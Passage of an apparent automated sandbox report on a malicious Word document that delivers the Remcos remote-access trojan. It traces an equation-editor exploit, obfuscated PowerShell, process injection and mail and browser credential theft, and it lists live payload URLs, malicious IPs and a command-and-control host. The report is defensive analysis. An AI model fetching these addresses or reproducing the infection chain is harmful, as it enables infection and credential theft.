                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: ESMTPPassword23_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword23_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword23_2_00402DB3
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3880, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-N6HMP4
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe20_2_0040569A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  Valid Accounts11
                  Native API
                  111
                  Scripting
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  15
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  21
                  Obfuscated Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts133
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Install Root Certificate
                  2
                  Credentials in Registry
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares21
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  Login Hook1
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Credentials In Files
                  4
                  File and Directory Discovery
                  Distributed Component Object Model211
                  Input Capture
                  1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts4
                  PowerShell
                  Network Logon Script422
                  Process Injection
                  1
                  Bypass User Account Control
                  LSA Secrets39
                  System Information Discovery
                  SSH4
                  Clipboard Data
                  3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials3
                  Security Software Discovery
                  VNCGUI Input Capture114
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                  Virtualization/Sandbox Evasion
                  DCSync31
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation
                  Proc Filesystem4
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt422
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540324 Sample: PO NAHK22012FA00000.docx.doc Startdate: 23/10/2024 Architecture: WINDOWS Score: 100 79 u4u.kids 2->79 107 Suricata IDS alerts for network traffic 2->107 109 Found malware configuration 2->109 111 Malicious sample detected (through community Yara rule) 2->111 113 28 other signatures 2->113 14 WINWORD.EXE 365 56 2->14         started        signatures3 process4 dnsIp5 85 u4u.kids 24.199.88.84, 443, 49161, 49162 TWC-12271-NYCUS United States 14->85 87 85.215.206.82, 49167, 49169, 49170 STRATOSTRATOAGDE Germany 14->87 73 C:\...\PO NAHK22012FA00000.docx.doc (copy), Microsoft 14->73 dropped 75 C:\Users\user\...\wg on 85.215.206.82.url, MS 14->75 dropped 77 ~WRF{DE8BB6AA-6431...3-75296C786D33}.tmp, Composite 14->77 dropped 93 Microsoft Office launches external ms-search protocol handler (WebDAV) 14->93 95 Office viewer loads remote template 14->95 97 Microsoft Office drops suspicious files 14->97 19 EQNEDT32.EXE 12 14->19         started        file6 signatures7 process8 file9 63 wennedgreatthingsw...odnwesforentrie.hta, HTML 19->63 dropped 65 wennedgreatthingsw...elifewithnew[1].hta, HTML 19->65 dropped 115 Office equation editor establishes network connection 19->115 117 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 19->117 23 mshta.exe 10 19->23         started        signatures10 process11 signatures12 131 Suspicious powershell command line found 23->131 133 PowerShell case anomaly found 23->133 26 powershell.exe 24 23->26         started        process13 file14 69 getbestthingswithb...thgreatthingson.vbS, Unicode 26->69 dropped 71 C:\Users\user\AppData\...\j0qjax5r.cmdline, Unicode 26->71 dropped 135 Suspicious powershell command line found 26->135 137 Obfuscated command line found 26->137 30 wscript.exe 1 26->30         started        33 powershell.exe 4 26->33         started        35 csc.exe 2 26->35         started        signatures15 process16 file17 143 Suspicious powershell command line found 30->143 145 Wscript starts Powershell (via cmd or directly) 30->145 147 Bypasses PowerShell execution policy 30->147 151 2 other signatures 30->151 38 powershell.exe 4 30->38         started        149 Installs new ROOT certificates 33->149 67 C:\Users\user\AppData\Local\...\j0qjax5r.dll, PE32 35->67 dropped 41 cvtres.exe 35->41         started        signatures18 process19 signatures20 127 Suspicious powershell command line found 38->127 129 Obfuscated command line found 38->129 43 powershell.exe 38->43         started        process21 dnsIp22 81 drive.google.com 142.250.181.238, 443, 49171 GOOGLEUS United States 43->81 83 drive.usercontent.google.com 216.58.212.129, 443, 49172 GOOGLEUS United States 43->83 139 Writes to foreign memory regions 43->139 141 Injects a PE file into a foreign processes 43->141 47 CasPol.exe 43->47         started        signatures23 process24 dnsIp25 89 servemail.exprotedsteel.pro 45.90.89.98, 49174, 49175, 6498 CMCSUS Bulgaria 47->89 91 geoplugin.net 178.237.33.50, 49176, 80 ATOM86-ASATOM86NL Netherlands 47->91 61 C:\Users\user\AppData\Local\Temp\...\logs.dat, data 47->61 dropped 99 Contains functionality to bypass UAC (CMSTPLUA) 47->99 101 Detected Remcos RAT 47->101 103 Tries to steal Mail credentials (via file registry) 47->103 105 8 other signatures 47->105 52 CasPol.exe 47->52         started        55 CasPol.exe 47->55         started        57 CasPol.exe 47->57         started        59 CasPol.exe 47->59         started        file26 signatures27 process28 signatures29 119 Tries to steal Instant Messenger accounts or passwords 52->119 121 Tries to steal Mail credentials (via file / registry access) 52->121 123 Searches for Windows Mail specific files 52->123 125 Tries to harvest and steal browser information (history, passwords, etc) 55->125

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  PO NAHK22012FA00000.docx.doc13%ReversingLabsWin32.Trojan.Generic
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp100%AviraEXP/CVE-2017-11882.Gen
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://www.imvu.comr0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%URL Reputationsafe
                  http://go.micros0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://login.yahoo.com/config/login0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  http://www.imvu.com0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://www.ebuddy.com0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    unknown
                    drive.google.com
                    142.250.181.238
                    truefalse
                      unknown
                      drive.usercontent.google.com
                      216.58.212.129
                      truefalse
                        unknown
                        servemail.exprotedsteel.pro
                        45.90.89.98
                        truetrue
                          unknown
                          u4u.kids
                          24.199.88.84
                          truetrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://85.215.206.82/270/weg/wg/deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthisnfds.doctrue
                              unknown
                              https://u4u.kids/clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yaktrue
                                unknown
                                http://geoplugin.net/json.gpfalse
                                • URL Reputation: safe
                                unknown
                                http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.htatrue
                                  unknown
                                  http://85.215.206.82/270/WRFFDCE.txttrue
                                    unknown
                                    http://85.215.206.82/270/igetbestthingswithbestpicturewithgreatthingsonme.tIFtrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.hta:EQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://b.scorecardresearch.com/beacon.jsbhv2D0A.tmp.22.drfalse
                                          unknown
                                          http://acdn.adnxs.com/ast/ast.jsbhv2D0A.tmp.22.drfalse
                                            unknown
                                            http://www.imvu.comrCasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv2D0A.tmp.22.drfalse
                                              unknown
                                              http://ocsp.entrust.net03powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv2D0A.tmp.22.drfalse
                                                unknown
                                                https://contoso.com/Licensepowershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 00000016.00000002.531960219.0000000002A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv2D0A.tmp.22.drfalse
                                                    unknown
                                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhv2D0A.tmp.22.drfalse
                                                        unknown
                                                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhv2D0A.tmp.22.drfalse
                                                          unknown
                                                          https://deff.nelreports.net/api/report?cat=msnbhv2D0A.tmp.22.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhv2D0A.tmp.22.drfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://go.microspowershell.exe, 0000000B.00000002.455991013.0000000002BF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            unknown
                                                            http://cache.btrll.com/default/Pix-1x1.gifbhv2D0A.tmp.22.drfalse
                                                              unknown
                                                              http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv2D0A.tmp.22.drfalse
                                                                unknown
                                                                https://www.google.comCasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://geoplugin.net/json.gpECasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://geoplugin.net/json.gp/Cpowershell.exe, 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://o.aolcdn.com/ads/adswrappermsni.jsbhv2D0A.tmp.22.drfalse
                                                                      unknown
                                                                      http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv2D0A.tmp.22.drfalse
                                                                        unknown
                                                                        http://www.msn.com/?ocid=iehpbhv2D0A.tmp.22.drfalse
                                                                          unknown
                                                                          https://contoso.com/powershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://nuget.org/nuget.exepowershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv2D0A.tmp.22.drfalse
                                                                            unknown
                                                                            http://static.chartbeat.com/js/chartbeat.jsbhv2D0A.tmp.22.drfalse
                                                                              unknown
                                                                              http://www.msn.com/de-de/?ocid=iehpbhv2D0A.tmp.22.drfalse
                                                                                unknown
                                                                                http://85.215.206.82/270/weg/wennedgreatthingswithgoodnwesforentrielifewithnew.htajEQNEDT32.EXE, 00000008.00000002.415353153.00000000008DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://drive.usercontent.google.compowershell.exe, 00000013.00000002.515289278.0000000002758000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv2D0A.tmp.22.drfalse
                                                                                      unknown
                                                                                      https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.nirsoft.net/CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://ocsp.entrust.net0Dpowershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000B.00000002.455991013.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.589694416.0000000002528000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.515289278.0000000002501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv2D0A.tmp.22.drfalse
                                                                                          unknown
                                                                                          http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv2D0A.tmp.22.drfalse
                                                                                            unknown
                                                                                            http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv2D0A.tmp.22.drfalse
                                                                                              unknown
                                                                                              https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv2D0A.tmp.22.drfalse
                                                                                                unknown
                                                                                                http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv2D0A.tmp.22.drfalse
                                                                                                  unknown
                                                                                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv2D0A.tmp.22.drfalse
                                                                                                    unknown
                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.ccleaner.com/go/app_cc_pro_trialkeybhv2D0A.tmp.22.drfalse
                                                                                                      unknown
                                                                                                      http://crl.entrust.net/server1.crl0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://www.imvu.com/yCasPol.exe, 00000018.00000002.527037105.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://contextual.media.net/8/nrrV73987.jsbhv2D0A.tmp.22.drfalse
                                                                                                          unknown
                                                                                                          http://www.imvu.comCasPol.exe, CasPol.exe, 00000018.00000002.527291764.0000000000459000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://contoso.com/Iconpowershell.exe, 0000000B.00000002.456616476.0000000003529000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://geoplugin.net/json.gpwCasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://contextual.media.net/bhv2D0A.tmp.22.drfalse
                                                                                                              unknown
                                                                                                              http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv2D0A.tmp.22.drfalse
                                                                                                                unknown
                                                                                                                https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv2D0A.tmp.22.drfalse
                                                                                                                  unknown
                                                                                                                  http://www.msn.com/bhv2D0A.tmp.22.drfalse
                                                                                                                    unknown
                                                                                                                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv2D0A.tmp.22.drfalse
                                                                                                                      unknown
                                                                                                                      http://85.215.206.82/270/weg/wg/wg on 85.215.206.82.url.0.drfalse
                                                                                                                        unknown
                                                                                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv2D0A.tmp.22.drfalse
                                                                                                                            unknown
                                                                                                                            https://support.googleCasPol.exe, 00000016.00000002.531817073.0000000001D9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://drive.google.compowershell.exe, 00000013.00000002.515289278.0000000002639000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://cdn.at.atwola.com/_media/uac/msn.htmlbhv2D0A.tmp.22.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                                                    unknown
                                                                                                                                    http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv2D0A.tmp.22.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://secure.comodo.com/CPS0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://policies.yahoo.com/w3c/p3p.xmlbhv2D0A.tmp.22.drfalse
                                                                                                                                        unknown
                                                                                                                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000013.00000002.522222538.0000000005153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.msn.com/advertisement.ad.jsbhv2D0A.tmp.22.drfalse
                                                                                                                                          unknown
                                                                                                                                          http://www.nirsoft.net8ECasPol.exe, 00000016.00000002.531106226.0000000000384000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://github.com/dahall/taskschedulerpowershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://www.ebuddy.comCasPol.exe, CasPol.exe, 00000018.00000002.527130707.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs
                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              142.250.181.238
                                                                                                                                              drive.google.comUnited States
                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                              45.90.89.98
                                                                                                                                              servemail.exprotedsteel.proBulgaria
                                                                                                                                              33657CMCSUStrue
